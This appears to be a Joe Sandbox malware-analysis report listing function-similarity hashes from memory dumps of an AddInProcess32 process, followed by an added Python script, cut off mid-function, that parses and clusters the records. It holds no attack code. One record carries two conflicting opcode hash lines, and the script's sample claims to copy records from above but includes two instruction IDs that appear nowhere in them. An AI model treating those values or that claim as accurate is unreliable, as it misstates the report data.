                • Instruction ID: 193bac33bad16c6c5e5b8c74d9732dd1f5ab658d61b9fb430afa3f9739a9b989
                • Opcode Fuzzy Hash: 86a8eacc1075eaf21272a2ed093debe0b501bd8710a93ee46709826df4ebe325
                • Instruction Fuzzy Hash: 3E41E074E012198FDB04DFA5D984BEEBBB2FF49300F10952AE415AB394D738594ACF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ee864e7af621766aacf424206da033c9f2aab01c6274df6844a4092a65053af9
                • Instruction ID: 21971051951929b89562af6b59214596000844a657523cef4305e22fdce5988c
                • Opcode Fuzzy Hash: ee864e7af621766aacf424206da033c9f2aab01c6274df6844a4092a65053af9
                • Instruction Fuzzy Hash: A7416471E0135A9BDB14DFA5CD81AEFBBB5AFC8700F14811AE405BB240DB70A946CB90
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1cd6d37051a29d86652998268f9619dfbb415431e230369e92800cd7fb05668b
                • Instruction ID: a367ff352f496947c1e6307027b3f7cbf75b060a3ebe8b94d9aec49a507ff191
                • Opcode Fuzzy Hash: 1cd6d37051a29d86652998268f9619dfbb415431e230369e92800cd7fb05668b
                • Instruction Fuzzy Hash: 22418D31A002099FDB149F74C948BBABBFAEF84344F04846AEA15DB251DB78DC45CFA1
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8871069a0b06b865232c585873375088412fbab3548936eea8132d804a3a039e
                • Instruction ID: e9dbc5a603c6dd880dbab3787109e1430ffbb3c3b808808c273e500f80600555
                • Opcode Fuzzy Hash: 8871069a0b06b865232c585873375088412fbab3548936eea8132d804a3a039e
                • Instruction Fuzzy Hash: E531D332F042268BDB1959A9999C37EB6E6EBC4AD0F18407DDA17C3384DFB4CC0487A1
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4689c18ac35ee546e29f9ea15bae985eef9249ab6db3c7ae97041c204be902c
                • Instruction ID: 5bb344e0f538db377e62ff84095b20577ea11e2804c5b783fb184fd7a8adf825
                • Opcode Fuzzy Hash: f4689c18ac35ee546e29f9ea15bae985eef9249ab6db3c7ae97041c204be902c
                • Instruction Fuzzy Hash: 2941DE74E012098FDB44DFA5D984AEDBBB2FF48310F10902AD415A7394DB385946CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 203ff62fa1b5e735abf4cdadd2ed820d75626350cf6e6a6566dbe92bc2f7ef9f
                • Instruction ID: 0a794ab16fcb8a7832ccb748dc67d3a7ebd5e6c385e22772a3f2e2b7e1cbac7a
                • Opcode Fuzzy Hash: 203ff62fa1b5e735abf4cdadd2ed820d75626350cf6e6a6566dbe92bc2f7ef9f
                • Instruction Fuzzy Hash: 1F31833570411A9FCB15AFA4D8486BFBBA7FB98280F104429FA159B350CB38DC61CBE0
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ee9f2db2970479e2461d6b1aa330e7e19892980c9a9f1a8e8e66940c6c5f815c
                • Instruction ID: 4f16cb153405148e9fd4d7437fe84ad6c365d8c5e073388dab8bbbf037065971
                • Opcode Fuzzy Hash: ee9f2db2970479e2461d6b1aa330e7e19892980c9a9f1a8e8e66940c6c5f815c
                • Instruction Fuzzy Hash: 2F316B7090134ADFDB04AFB1D8587EEBBB1FB4A312F0098A9D512672D4CB780A48CF90
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8a2eb634e51d87aece0965a836643cb78dd862a237b7cf3b351dad590e0ca1e
                • Instruction ID: 539c2654ef511ddc5044d186deae8775c169920da96a358c54a6024b9c68ecd1
                • Opcode Fuzzy Hash: d8a2eb634e51d87aece0965a836643cb78dd862a237b7cf3b351dad590e0ca1e
                • Instruction Fuzzy Hash: A3217435B001158BDB1526398898B7EF697DFC869DB244439DB06CB394DF65CC82D780
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c7bb441fd6bacd09b10e28de42781e6e58c5ba55cfa54c3733e3f2ab79e8f40
                • Instruction ID: 887b7a6b884f4a86042d97249ba41ea34e5e824fa19c172de0c009ff270a7fbf
                • Opcode Fuzzy Hash: 8c7bb441fd6bacd09b10e28de42781e6e58c5ba55cfa54c3733e3f2ab79e8f40
                • Instruction Fuzzy Hash: 57318171A405058FCB04CF69C898AAEB7B7FF89394B258119E615A73A6DB34DC02CB90
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 087089aa684b36b60cd205603637c432ce62358036e50242bd314de27c56a35d
                • Instruction ID: 351d98a279c4fd201bfbc2067e8049574a5b725160b31a95088722cef01c403d
                • Opcode Fuzzy Hash: 087089aa684b36b60cd205603637c432ce62358036e50242bd314de27c56a35d
                • Instruction Fuzzy Hash: 9921C131A00156AFCB14DF24D884ABE77A5EBC9790B50C06DEE099B340DB35EE45CBD1
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d597054ca31fd82035dfb4c023d4c2525f0f663333cdaf7aff8aa6f2fa35d337
                • Instruction ID: a33abb511e40f1be01cb3b2e8ee9f7ec5a6190517174a71d49b7cf33b1ee5162
                • Opcode Fuzzy Hash: d597054ca31fd82035dfb4c023d4c2525f0f663333cdaf7aff8aa6f2fa35d337
                • Instruction Fuzzy Hash: 7A218D31E0124ACBDB14EBA8D5196BEBFF2EB48784F204519C602BBB41CB759D44CFA5
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90cbf99ceb46a5457cfc92d46a149d52e10e871baed2fe3377fa17879d48c0a3
                • Instruction ID: 7c0bc2d7a4012b503de249cc817d3f12fa9b18ac8752b29ff016fe7c95983981
                • Opcode Fuzzy Hash: 90cbf99ceb46a5457cfc92d46a149d52e10e871baed2fe3377fa17879d48c0a3
                • Instruction Fuzzy Hash: B721C335B015138BC7259E65D85893AF392FF897957544579EA06EB344CF34DC02CBC0
                Memory Dump Source
                • Source File: 00000005.00000002.4523274901.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_163d000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4492d65e3b0497e9bbcd97a34902df4c8961e75204d713539ab5241751d3e80a
                • Instruction ID: 8f6fad3169bc1126eead43b329e13bfa6400ce59130e258ca6d900070b63b445
                • Opcode Fuzzy Hash: 4492d65e3b0497e9bbcd97a34902df4c8961e75204d713539ab5241751d3e80a
                • Instruction Fuzzy Hash: 1521FFB1504204AFDB15CF64C980B26FBA5EBC4714F60C56DE90A0B352C77AD446CA61
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc80f326087c1fcf8d93ee261c0dc429769594f3fcbea014a2de690bb952fdbf
                • Instruction ID: 8579eef9544216f1e5945b006d20e5c34fadc90065c862db6606c212342c833a
                • Opcode Fuzzy Hash: dc80f326087c1fcf8d93ee261c0dc429769594f3fcbea014a2de690bb952fdbf
                • Instruction Fuzzy Hash: 03212432E0839A8FCF01DBB898504EEFB70FF8A310B258396D665B7150EB352906C790
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4a66d9ca755cf524ccbf83aeac83b2528d516aa576fd765c1c1a8dc563b944c5
                • Instruction ID: cd5a66c6b03d3d048d6b9cdbe4187692f7baafaf8608325eccd6d93770d12df6
                • Opcode Fuzzy Hash: 4a66d9ca755cf524ccbf83aeac83b2528d516aa576fd765c1c1a8dc563b944c5
                • Instruction Fuzzy Hash: DD31C478E01348CFCB04DFA8E5888ADBBB2FF49701B2054A9E819AB320D735AD41CF40
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29ffb609dd0ccd912c834c19a65d3d01e1af141efdea49ccff23a11e7368b4e3
                • Instruction ID: 6067dfc5ca52e2fc91f165a4bffcc75b3cc56416a8c9668bcd9c35fcd0d97b89
                • Opcode Fuzzy Hash: 29ffb609dd0ccd912c834c19a65d3d01e1af141efdea49ccff23a11e7368b4e3
                • Instruction Fuzzy Hash: EA21963660511A9FCB25BFA4D84877BB7A6FB98294F104429F6059B340CB38DC51CBE4
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1b74500650fc8de1c4edd8c8eb2f856beb69a39145912ce25880256b585a72d
                • Instruction ID: 50b6a4ea19d7dbe8b25e683d5d8a3b2a2fcec6fbb112301589500ea435454729
                • Opcode Fuzzy Hash: d1b74500650fc8de1c4edd8c8eb2f856beb69a39145912ce25880256b585a72d
                • Instruction Fuzzy Hash: B211E2367083545FCB4AAF7488502BE3BE3AFC8110B04482AE505D7381DF384D05C7AA
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1976c0176aa435925d2df288d48e57b209b7229c4845117e1a371096f7b85687
                • Instruction ID: 29ac3db913a2826c7a145502b4abc63af5d2c457aaf3298be291e0450ee3f84e
                • Opcode Fuzzy Hash: 1976c0176aa435925d2df288d48e57b209b7229c4845117e1a371096f7b85687
                • Instruction Fuzzy Hash: AA11E5347042589FD705167A9C186BBFEEBAFCA3A0B4484B7E546C7286DD388C028361
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4d4aed47c49bf5ae96b98bcd610e509603b4f699ec73dc569145983d654a9068
                • Instruction ID: 9b37a31511de5477dacdf544fc1e85d07aacffbceb06690fb22efa61e2758073
                • Opcode Fuzzy Hash: 4d4aed47c49bf5ae96b98bcd610e509603b4f699ec73dc569145983d654a9068
                • Opcode Fuzzy Hash: 07f29ac094a1408579f7660ba2eeec1a3fa50f37f2a71df3300272823a307c63
                • Instruction Fuzzy Hash: 31C1A074E01218CFEB54EFA5C994B9DBBB2EF89300F2081A9D419AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c63de3e00e898bbd24e2fc12ba9a65294d8ca838751b0526cb50d43c8814d1f4
                • Instruction ID: e61abd1e65bf374896a2c967dbfaf8f7074c93532d82e5d88c317b5340a677a2
                • Opcode Fuzzy Hash: c63de3e00e898bbd24e2fc12ba9a65294d8ca838751b0526cb50d43c8814d1f4
                • Instruction Fuzzy Hash: 72C1AE74E01218CFEB54DFA5C984B9DBBB2EF89300F2081A9D419AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f64b45339c1dfeeb87e4b08799e765f6caec548b8d5b1e63fcb3050071b8c740
                • Instruction ID: d1f95d0fe2cefb54d933c1c90138c845c8198e593e1dffe14737c92bdf650177
                • Opcode Fuzzy Hash: f64b45339c1dfeeb87e4b08799e765f6caec548b8d5b1e63fcb3050071b8c740
                • Instruction Fuzzy Hash: 24C1AE74E01218CFEB54DFA5C994B9DBBB2EF89300F2081A9D819AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 891b2ac3ccf3e6f20fd0bd682f5af85848ff9260cadbc0c481b53fca31359d59
                • Instruction ID: 3121e51e5de8097ffa6a000fb22d4c14268bec3b87d7a5c88819f4b4525b290a
                • Opcode Fuzzy Hash: 891b2ac3ccf3e6f20fd0bd682f5af85848ff9260cadbc0c481b53fca31359d59
                • Instruction Fuzzy Hash: 99C18D74E01218CFDB54DFA9D984BADBBB2EB89300F2081A9D809AB355DB355D85CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cdd56cc15b5259df5f510b9171b18f4406519a5c502a63e6cc13f80ecda67a2b
                • Instruction ID: 40e82caa4fb693b233867146ffbdd703b688081b901b31059c12d64f76c2f3da
                • Opcode Fuzzy Hash: cdd56cc15b5259df5f510b9171b18f4406519a5c502a63e6cc13f80ecda67a2b
                • Instruction Fuzzy Hash: 62C1AE74E00218CFEB54DFA5D994B9DBBB2EF88300F2081A9D819AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79a275321c649f726e0690de944d5218473db158f394917877f4d7ff1ef45672
                • Instruction ID: 696cbef5307c1e1f3514c809b17df4ffff617c9a5aa9aa9e633a8d43791261dc
                • Opcode Fuzzy Hash: 79a275321c649f726e0690de944d5218473db158f394917877f4d7ff1ef45672
                • Instruction Fuzzy Hash: 28C1AE74E00218CFEB54DFA5C994B9DBBB2BF88300F2081A9D419AB3A5DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f22c9a08019a0ec48b611fbb57e4f8ab9ed3c312ed8af1554f15add9e56bb277
                • Instruction ID: d7f266431b25ec78e5a05d33f7f7ca03ca82e7ab7a2212c7d4c221af62dc6246
                • Opcode Fuzzy Hash: f22c9a08019a0ec48b611fbb57e4f8ab9ed3c312ed8af1554f15add9e56bb277
                • Instruction Fuzzy Hash: 51C17E74E01218CFDB54DFA9D984BADBBB2EF89300F1081A9D809AB365DB355E85CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33e4ead73534d7e1e1ec9e91381bc088b69068b45ac7f8c5a5c60fa042646ece
                • Instruction ID: d35bff68fc167a198ae96361d430b9319958a4f126805a21edbee672c7238165
                • Opcode Fuzzy Hash: 33e4ead73534d7e1e1ec9e91381bc088b69068b45ac7f8c5a5c60fa042646ece
                • Instruction Fuzzy Hash: DBC1BF74E00218CFEB54DFA5D994B9DBBB2EF89300F2081A9D419AB3A5DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7a8eb68a0721321d231055b2f1aa6087e74888d45b63fbc4cbf136d5fbf1ac0
                • Instruction ID: 37c3e8bdf5a5338bb9129499314a87d17697c9ad9381789203a3793d1c9d21db
                • Opcode Fuzzy Hash: f7a8eb68a0721321d231055b2f1aa6087e74888d45b63fbc4cbf136d5fbf1ac0
                • Instruction Fuzzy Hash: 54C1AF74E01218CFEB54DFA5C994B9DBBB2EF89300F2081A9D819AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99ac367de232c9386dd7e67197fe99ecbc4ede73834654d20c0f613cd682ff37
                • Instruction ID: 659a6edce718e127869c5be4603532ed1b601c57250dec8f5958d16c65a0ca32
                • Opcode Fuzzy Hash: 99ac367de232c9386dd7e67197fe99ecbc4ede73834654d20c0f613cd682ff37
                • Instruction Fuzzy Hash: 6FC1AF74E01218CFEB54EFA5C994B9DBBB2EF89300F2081A9D419AB365DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0c5b4d28b1ce486e1a0e1d5d93c33ad582ef3189c49539faf76bbbcfc8562a7
                • Instruction ID: f54183ffc6b7ff55d721e77deeda1f4e5b5f505bc9b41246e915559e5287aae1
                • Opcode Fuzzy Hash: e0c5b4d28b1ce486e1a0e1d5d93c33ad582ef3189c49539faf76bbbcfc8562a7
                • Instruction Fuzzy Hash: 1FC1BE74E01218CFEB54DFA5C984B9DBBB2EF89300F2081A9D419AB3A5DB355E85CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edc656f462ef7bf5594494f9e435c9acfaf648372db4de42f0ce8b1dfc9d05f3
                • Instruction ID: 0e279df1aedfeaf5494c0b0fb672a52425acc980d58a054a267f34c10334fe89
                • Opcode Fuzzy Hash: edc656f462ef7bf5594494f9e435c9acfaf648372db4de42f0ce8b1dfc9d05f3
                • Instruction Fuzzy Hash: 1EC19C74E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D419AB3A5DB355E81CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0603728f8371016c059e8cd1a0e7f69a9009d380eb98a62e6cdecdc435cce42
                • Instruction ID: 6cf2fcfad84d16aaaf0b76ab239805b4b70ee313c61f138876a852260c05c83d
                • Opcode Fuzzy Hash: b0603728f8371016c059e8cd1a0e7f69a9009d380eb98a62e6cdecdc435cce42
                • Instruction Fuzzy Hash: AEB18174E00218CFDB54DFA9D984A9DBBB2FF88310F2181A9D819AB365DB34AD41CF50
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a4485c0f1489d7ebdca0e1843aedbc55fd4d59173aafa8b5e9df97b074e3371
                • Instruction ID: 37224e58d7ffa8d286deb551128ec8f7381efd709f70a48501c0131563986514
                • Opcode Fuzzy Hash: 2a4485c0f1489d7ebdca0e1843aedbc55fd4d59173aafa8b5e9df97b074e3371
                • Instruction Fuzzy Hash: 25A19B74A01228CFDB64DF24C954BAABBB2FF4A340F1085EAD50AA7350CB359E81CF51
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e88f4e022a05369844bf4c3c31bdcec2d11e5ceddc1f2e2033f475e3115343d
                • Instruction ID: 1f774411506e5600517c18b9962dfc3cd80c4f78be98b8f73c80c50a2460b666
                • Opcode Fuzzy Hash: 5e88f4e022a05369844bf4c3c31bdcec2d11e5ceddc1f2e2033f475e3115343d
                • Instruction Fuzzy Hash: 6551D274E016488FDB48DFAAD984A9DBBF2FF89300F248169D418AB365DB309942CF10
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbf5d37d1957f4752981436131b5a85cab9f62900b879b473a94a89086299e6b
                • Instruction ID: d0dcbce7046ee4b4ced1af19fd02c5f52f19f655c20e5da8f978cb170facb61c
                • Opcode Fuzzy Hash: cbf5d37d1957f4752981436131b5a85cab9f62900b879b473a94a89086299e6b
                • Instruction Fuzzy Hash: 0851BE74A01228CFCB64DF24D894BAAB7B2FF4A340F5085E9D40AA7350CB359E81CF50
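The records above are repetitive, but they carry two facts an analyst can act on: every "Source File" is a non-PE-backed dump (based on PE: false) whose file name carries the region base and a page protection value, and most of the functions dumped from the 06A60000 region have Instruction Fuzzy Hashes that differ from each other in only a handful of hex positions, i.e. the region is full of near-identical functions. The script below is an added example (not Joe Sandbox code) that parses records in exactly this text format, checks that each record's stated Offset matches the base address in its .sdmp name, and groups functions by fuzzy-hash similarity. Three things are assumptions rather than facts from the page: that the 4th and 5th dotted fields of the .sdmp name are the region base and the page protection (0x40 being the Windows constant PAGE_EXECUTE_READWRITE), that a plain position-wise Hamming distance over the hex string is a reasonable way to compare these fuzzy hashes, and the clustering threshold of 8 differing positions. The sample input is constructed from five of the records shown above, reduced to the lines the parser reads.

```python
"""Cluster near-duplicate functions from Joe Sandbox per-function similarity
records.  Added example for this page, not Joe Sandbox's own code."""
import re
from dataclasses import dataclass
from itertools import combinations

# Constructed sample: five records copied from the report section above,
# reduced to the three lines this script reads (other fields are ignored).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
• Instruction ID: 51c6c25fbb2d5bf3c8fe74aff617648e06228951af435bebc7c15ca4a0489b48
• Instruction Fuzzy Hash: 6AC19074E01218CFEB54EFA5C994B9DBBB2EF89300F1081A9D419AB365DB355E81CF50
Memory Dump Source
• Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
• Instruction ID: 492dd49e73ef4133ad76d8002151b610281b41abf78c2235da9abfe9b12c8c66
• Instruction Fuzzy Hash: 31C1A074E01218CFEB54EFA5C994B9DBBB2EF89300F2081A9D419AB365DB355E81CF50
Memory Dump Source
• Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
• Instruction ID: 659a6edce718e127869c5be4603532ed1b601c57250dec8f5958d16c65a0ca32
• Instruction Fuzzy Hash: 6FC1AF74E01218CFEB54EFA5C994B9DBBB2EF89300F2081A9D419AB365DB355E81CF50
Memory Dump Source
• Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
• Instruction ID: 6cf2fcfad84d16aaaf0b76ab239805b4b70ee313c61f138876a852260c05c83d
• Instruction Fuzzy Hash: AEB18174E00218CFDB54DFA9D984A9DBBB2FF88310F2181A9D819AB365DB34AD41CF50
Memory Dump Source
• Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
• Instruction ID: 37224e58d7ffa8d286deb551128ec8f7381efd709f70a48501c0131563986514
• Instruction Fuzzy Hash: 25A19B74A01228CFDB64DF24C954BAABBB2FF4A340F1085EAD50AA7350CB359E81CF51
"""

PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant


@dataclass
class FunctionRecord:
    instruction_id: str
    fuzzy_hash: str
    base: int       # region base taken from the .sdmp file name
    offset: int     # "Offset:" value stated in the record
    protect: int    # ASSUMED: 5th dotted field of the .sdmp name
    pe_backed: bool


SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")


def parse_sdmp_name(name: str) -> tuple[int, int]:
    """Return (base, protect).  ASSUMED layout, not documented on this page:
    4th dotted field = region base, 5th = page protection, both hex."""
    fields = name.split(".")
    return int(fields[3], 16), int(fields[4], 16)


def parse_records(text: str) -> list[FunctionRecord]:
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        src = SOURCE_RE.search(chunk)
        iid = re.search(r"Instruction ID:\s*([0-9a-f]{64})", chunk)
        fuzzy = re.search(r"Instruction Fuzzy Hash:\s*([0-9A-F]+)", chunk)
        if not (src and iid and fuzzy):
            continue  # incomplete record: skip it rather than guess
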